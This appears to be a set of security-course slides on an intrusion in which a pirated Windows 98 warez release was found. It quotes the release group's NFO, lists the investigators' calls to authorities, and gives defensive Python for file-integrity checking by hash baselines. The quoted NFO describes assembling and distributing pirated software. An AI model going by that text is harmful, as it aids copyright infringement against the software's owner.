    ws98_FINAL_Retail_Full_Setup-PWA/
  • ./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndo
    ws98_FINAL_Retail_Full_Setup-PWA/PWA.NFO
  • ./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndo
    ws98_FINAL_Retail_Full_Setup-PWA/pwa98rfl1.zip
  • ./open/ /calibreX/Win98.Final-PWA/file_id.diz
  • ./open/ /calibreX/Win98.Final-PWA/PWA.NFO
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cba.zip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbd.good.z
    ip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbb.zip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbc.zip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbd.zip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbe.zip
  • . . .
  • ./open/nothing_here/
  • ./open/nothing_here/ /
  • ./open/nothing_here/ /pwa98cba.zip

67
/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/
  • Pirates With Attitudes
  • Supplier PWA Gods
  • Cracker N/A
  • Packager Murmillius
  • Protection Serial Number
  • Type Operating System
  • Disks 21 x 5meg

68
PWA.NFO
  • Here it is Windows '98 Final release - Retail
    Full Install!
  • While every other group will be bringing you so
    many good programs for this operating system,
    it's PWA that brings you the OS itself. It is
    fortunately for the user community that this is
    the case or you would probably have ended up with
    a ripped down release from some other lame group
    missing important system files like KRNL386.exe,
    because disklimits are more important nowadays to
    these people than a working release.

69
PWA.NFO cont
  • You need to download the CABS and the RETAIL
    SETUP and unzip/unrar everything into one
    directory. The reason for this is that as soon
    as I get install keys, I can release RETAIL
    UPGRADE, OEM FULL and OEM UPGRADE versions and
    they will only take 4 meg each (the CAB zips are
    generic thruout all these versions, I can just
    package up the differences in separate zips to
    save everyone space and time). You just
    unzip whichever one you want into the same
    directory as the generic CAB zips.

70
Question Is PWA.NFO Hearsay?
71
What we did
  • Called Microsoft's anti-piracy line.
  • Useless
  • Called FBI
  • Pretty useless as well.
  • Called Pace University
  • This got results
  • not necessarily the right results.

72
Integrity Management
  • What is it?
  • How do you do it?
  • Tripwire
  • Comparison Copies
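Both bullets come down to the same mechanism: record a fingerprint of every file you care about while the system is known-good, keep that record (or a full comparison copy) somewhere the intruder cannot reach, and diff against it later. The following is an added example (not Tripwire, and not code from the course) of that baseline-and-compare loop; the demo builds a small constructed tree modelled on the incident above (a replaced binary, a new file under /tmp, the faxsurvey script renamed away) and all names are mine.

```python
import hashlib
import os
import tempfile


def file_fingerprint(path):
    """Mode, size and SHA-256 of one file: the fields a baseline records.
    The hash is what matters; mtime is omitted because it is trivially reset."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return (st.st_mode, st.st_size, h.hexdigest())


def snapshot(root):
    """Fingerprint every regular file under root, keyed by relative path."""
    base = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks and device nodes need their own policy
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            base[rel] = file_fingerprint(full)
    return base


def compare(baseline, current):
    """What changed since the baseline: added, removed and modified paths."""
    common = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def _write(root, rel, data):
    """Helper for the constructed scenario: create rel (slash path) under root."""
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)


def demo():
    """Constructed scenario: baseline a small tree, then make the kinds of
    changes seen in the incident and report what the comparison catches."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "bin/sh", b"#!/bin/sh\necho original shell\n")
        _write(root, "cgi-bin/faxsurvey", b"#!/bin/sh\n# faxsurvey cgi\n")
        _write(root, "etc/passwd", b"root:*:0:0:root:/root:/bin/sh\n")
        before = snapshot(root)          # in practice: stored off-host
        # Same size as the original, so only the hash reveals the swap.
        _write(root, "bin/sh", b"#!/bin/sh\necho trojaned shell\n")
        _write(root, "tmp/.s/s.c", b"int main(void) { return 0; }\n")
        os.remove(os.path.join(root, "cgi-bin", "faxsurvey"))
        after = snapshot(root)
        return compare(before, after)
```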